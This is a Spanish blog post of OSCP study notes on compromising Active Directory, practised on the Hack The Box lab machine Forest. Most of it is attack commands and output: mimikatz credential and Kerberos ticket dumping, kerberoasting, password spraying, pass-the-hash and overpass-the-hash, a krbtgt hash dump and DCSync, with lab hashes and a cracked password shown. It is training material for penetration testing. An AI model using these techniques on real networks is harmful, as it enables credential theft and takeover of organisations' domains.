Apuntes de mi preparación para la certificación OSCP (Active Directory)

May 21 2020

Active Directory:

Para este tema en particular estaré usando la máquina Forest de Hack The Box, en la ejecución de varias técnicas que permitirán comprometer un AD. Estas técnicas no necesariamente son aplicadas en la resolución de la máquina.

Máquina de Práctica: Forest de Hack the Box.

Acceso: psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected]

Obtención de Información de la manera tradicional:

net user
net user /domain
net user moyapj /domain
net group
net group /domain

Obtención de información con PowerShell

Obtener Información del Dominio:

PS C:\Windows\system32> [System.DirectoryServices.ActiveDirectory.Domain]::GetCu
rrentDomain()

Con el uso de herramientas:

Powerview.ps1

Esta herramienta se puede descargar de aquí.

Es parte de todas las herramientas de PowerShellEmpire, para ejecutarla se debe realizar lo siguiente:

PS C:\ PC > ./Import-Module .\Powerview.ps1

PS C:\tmp> Get-NetLoggedon -ComputerName forest

et-NetLoggedon -ComputerName forest

wkui1_username wkui1_logon_domain wkui1_oth_domains wkui1_logon_server

-------------- ------------------ ----------------- ------------------

FOREST$ HTB

Para listar los computadores del dominio:

Get-ADComputer -Filter * -Property * | Select-Object
Name,OperatingSystem,OperatingSystemVersion,ipv4Address | Export-CSV ADcomputerslist.csv -NoTypeInformation -Encoding UTF8

Para listar las sesiones de red de un computador del dominio.

PS C:\tmp> Get-NetSession -ComputerName forest
Get-NetSession -ComputerName forest
sesi10_cname sesi10_username sesi10_time sesi10_idle_time
------------ --------------- ----------- ----------------
\10.10.14.27 administrator 414 410
\10.10.14.27 administrator 409 5
\10.10.14.27 administrator 409 0
\10.10.14.27 administrator 408 265
\[::1] FOREST$ 19 5

Uso de mimikatz:

Mimikatz permite extraer credenciales de memoria que se almacenan cifradas, junto con la clave para decifrar.

PS C:\tmp> .\mimikatz.exe
\mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #19041 May 19 2020 00:48:32
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz #

Para extraer los hash primero debemos verificar si contamos con los privilegios adecuados.

mimikatz # privilege::debug
Privilege '20' OK

Ahora con la ejecución del módulo sekurlsa extraemos los hash.

mimikatz # sekurlsa::logonPasswords
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:20:38 AM
SID : S-1-5-20
msv :
[00000003] Primary
* Username : FOREST$
* Domain : HTB
* NTLM : 7b9c43259d65eda955306bd375599049
* SHA1 : d447b11891ce103e53fcf31e87feaf7f3510021f
tspkg :
wdigest :
* Username : FOREST$
* Domain : HTB
* Password : (null)
kerberos :
* Username : forest$
* Domain : HTB.LOCAL
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 35268 (00000000:000089c4)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 5/21/2020 11:20:34 AM
SID :
msv :
[00000003] Primary
* Username : FOREST$
* Domain : HTB
* NTLM : 7b9c43259d65eda955306bd375599049
* SHA1 : d447b11891ce103e53fcf31e87feaf7f3510021f
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 5/21/2020 11:20:39 AM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:20:34 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : FOREST$
* Domain : HTB
* Password : (null)
kerberos :
* Username : forest$
* Domain : HTB.LOCAL
* Password : (null)
ssp :
credman :

Se puede ver en el out del comando que se muestran los hash NTLM y SHA1. Los NTLM servirán para usar la técnica de PtH (Pass the Hash).

Para ver los tickets se usará el mismo módulo sekurlsa con el siguiente comando.

mimikatz # sekurlsa::tickets
Authentication Id : 0 ; 30712496 (00000000:01d4a2b0)
Session : Network from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:33:02 PM
SID : S-1-5-18
* Username : FOREST$
* Domain : HTB.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 5/21/2020 8:51:57 PM ; 5/22/2020 6:51:57 AM ; 5/28/2020 11:21:17 AM
Service Name (02) : krbtgt ; HTB.LOCAL ; @ HTB.LOCAL
Target Name (--) : @ HTB.LOCAL
Client Name (01) : FOREST$ ; @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d577a70695e74b6ed73af919437e6b23552e0c0d19baca1272ac500b196762bb
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
Authentication Id : 0 ; 30712454 (00000000:01d4a286)
Session : Network from 0
User Name : FOREST$
Domain : HTB
Logon Server : (null)
Logon Time : 5/21/2020 11:33:02 PM
SID : S-1-5-18
* Username : FOREST$
* Domain : HTB.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 5/21/2020 8:51:57 PM ; 5/22/2020 6:51:57 AM ; 5/28/2020 11:21:17 AM
Service Name (02) : krbtgt ; HTB.LOCAL ; @ HTB.LOCAL
Target Name (--) : @ HTB.LOCAL
Client Name (01) : FOREST$ ; @ HTB.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
d577a70695e74b6ed73af919437e6b23552e0c0d19baca1272ac500b196762bb
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]

Se puede ver en la salida que se muestran los TGS (Ticket Granting Service) y los TGT (Ticket Granting Ticket).

Ataques a Cuentas de Servicio

Con el comando klist permite ver los tickets en caché.

PS C:\Windows\system32> klist
list
Current LogonId is 0:0x3e7
Cached Tickets: (8)
#0> Client: forest$ @ HTB.LOCAL
Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: FOREST
#1> Client: forest$ @ HTB.LOCAL
Server: krbtgt/HTB.LOCAL @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: FOREST
#2> Client: forest$ @ HTB.LOCAL
Server: cifs/FOREST @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:30:15 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#3> Client: forest$ @ HTB.LOCAL
Server: FOREST$ @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:41 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#4> Client: forest$ @ HTB.LOCAL
Server: cifs/FOREST.htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#5> Client: forest$ @ HTB.LOCAL
Server: LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#6> Client: forest$ @ HTB.LOCAL
Server: LDAP/FOREST @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST
#7> Client: forest$ @ HTB.LOCAL
Server: ldap/FOREST.htb.local @ HTB.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 5/22/2020 7:28:40 (local)
End Time: 5/22/2020 17:28:40 (local)
Renew Time: 5/29/2020 7:28:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: FOREST

Con Mimikatz también es posible extraer esta información.mimikatz #

kerberos::list -export
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:47 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:36 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : DNS/forest.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:10 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : GC/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000005] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:30:15 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000006] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:41 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : FOREST$ @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000007] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000008] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[00000009] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : LDAP/FOREST @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
[0000000a] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : ldap/FOREST.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL

mimikatz # kerberos::list -export
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
   * Saved to file : 0-60a10000-forest$@krbtgt~HTB.LOCAL-HTB.LOCAL.kirbi
[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : krbtgt/HTB.LOCAL @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   * Saved to file : 1-40e10000-forest$@krbtgt~HTB.LOCAL-HTB.LOCAL.kirbi
[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:47 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 2-40a50000-forest$@cifs~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:36 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : DNS/forest.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 3-40a50000-forest$@DNS~forest.htb.local-HTB.LOCAL.kirbi
[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:43:10 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : GC/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 4-40a50000-forest$@GC~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000005] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:30:15 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 5-40a50000-forest$@cifs~FOREST-HTB.LOCAL.kirbi
[00000006] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:41 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : FOREST$ @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 6-40a50000-forest$@FOREST$-HTB.LOCAL.kirbi
[00000007] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : cifs/FOREST.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 7-40a50000-forest$@cifs~FOREST.htb.local-HTB.LOCAL.kirbi
[00000008] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : LDAP/FOREST.htb.local/htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 8-40a50000-forest$@LDAP~FOREST.htb.local~htb.local-HTB.LOCAL.kirbi
[00000009] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : LDAP/FOREST @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 9-40a50000-forest$@LDAP~FOREST-HTB.LOCAL.kirbi
[0000000a] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 5/22/2020 7:28:40 AM ; 5/22/2020 5:28:40 PM ; 5/29/2020 7:28:40 AM
   Server Name : ldap/FOREST.htb.local @ HTB.LOCAL
   Client Name : forest$ @ HTB.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
   * Saved to file : 10-40a50000-forest$@ldap~FOREST.htb.local-HTB.LOCAL.kirbi

Para determinar las credenciales del servicio de debe transferir el archivo del servicio deseado para luego obtener la clave con el paquete kerberoast.

Para ello se deben instalar los siguientes paquetes.

pip3 install kerberoast
https://github.com/nidem/kerberoast

Y para crackear el password de la siguiente manera.

python3 tgsrepcrack.py ../../hackthebox/wordlist.txt 8-40a50000-forest\$@LDAP\~FOREST.htb.local\~htb.local-HTB.LOCAL.kirbi

Al terminar el proceso, obtiene la clave del servicio y con ella se podrá luego elevar privilegios.

Otras técnicas de obtención de claves

Primero hay que conocer la política de cuentas del directorio.

PS C:\tmp> net accounts
net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.

Una vez que se tiene identificado el umbral de bloqueo para las cuentas, se puede realizar un ataque de fuerza bruta con el paquete Spray-Password.ps1.

https://raw.githubusercontent.com/ZilentJack/Spray-Passwords/master/Spray-Passwords.ps1

Para ello en necesario transferir el script a la máquina windows víctima y posteriormente se realiza lo siguiente:

PS C:\tmp> .\Spray-Passwords.ps1 -Pass s3rvice -Admin
\Spray-Passwords.ps1 -Pass s3rvice -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'svc-alfresco' = 's3rvice'
Users guessed are:
'svc-alfresco' with password: 's3rvice'

Con el uso de ese script se pudo determinar que el usuario svc-alfresco tiene el password s3rvice.

Movimiento Lateral den Active Directory

Pass The Hash

Permite autenticarse en un equipo proporcionando el hash y no el password en texto plano. Esta técnica solo sirve para autenticar cuando el servidor o servicio usa NTLM y no Kerberos.

Usando esta técnica fue como se accedió a la linea de comandos de Forest. En este caso se uso psexec.py de impacket. Aunque también se podría usar el Pass The Hash Toolkit https://github.com/byt3bl33d3r/pth-toolkit.

psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 [email protected]

Pass The Ticket

Overpass The Hash

Es una combinación de dos técnicas, Pass The Hash y Pass The Ticket. Lo que hace es obtener un ticket válido de kerberos y autenticarse pasando el hash NTLM.

mimikatz # sekurlsa::pth /user:svc-alfresco /domain:htb /ntlm:c2b37b75462b3acfa9f489f7dfd715db /run:Powershell.exe
user : svc-alfresco
domain : htb
program : Powershell.exe
impers. : no
NTLM : c2b37b75462b3acfa9f489f7dfd715db
| PID 3196
| TID 1304
| LSA Process is now R/W
| LUID 0 ; 11059431 (00000000:00a8c0e7)
\_ msv1_0 - data copy @ 0000024701D23DA0 : OK !
\_ kerberos - data copy @ 0000024701A34878
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 00000247047D9DA8 (32) -> null

Golden Ticket:

mimikatz #lsadump::lsa /patch
Domain : HTB / S-1-5-21-3072663084-364016917-1341370565
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 32693b11e6aa90eb43d32c72a07ceea6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 819af826bb148e603acb0f33d17632f8
RID : 000001f7 (503)
User : DefaultAccount
LM :
NTLM :
RID : 00000463 (1123)
User : $331000-VK4ADACQNUCA
LM :
NTLM :
RID : 00000464 (1124)
User : SM_2c8eef0a09b545acb
LM :
NTLM :
RID : 00000465 (1125)
User : SM_ca8c2ed5bdab4dc9b
LM :
NTLM :
RID : 00000466 (1126)
User : SM_75a538d3025e4db9a
LM :
NTLM :
RID : 00000467 (1127)
User : SM_681f53d4942840e18
LM :
NTLM :
RID : 00000468 (1128)
User : SM_1b41c9286325456bb
LM :
NTLM :
RID : 00000469 (1129)
User : SM_9b69f1b9d2cc45549
LM :
NTLM :
RID : 0000046a (1130)
User : SM_7c96b981967141ebb
LM :
NTLM :

Sincronización de Active Directory

Generalmente el controlador de dominio tiene una o más réplicas, mimikatz aprovecha esto para extraer hashes.

mimikatz # lsadump::dcsync /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 9/18/2019 10:09:08 AM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6

Relacionado

Publicado enBlog OSCP Tutoriales

EtiquetasDirectorio Activo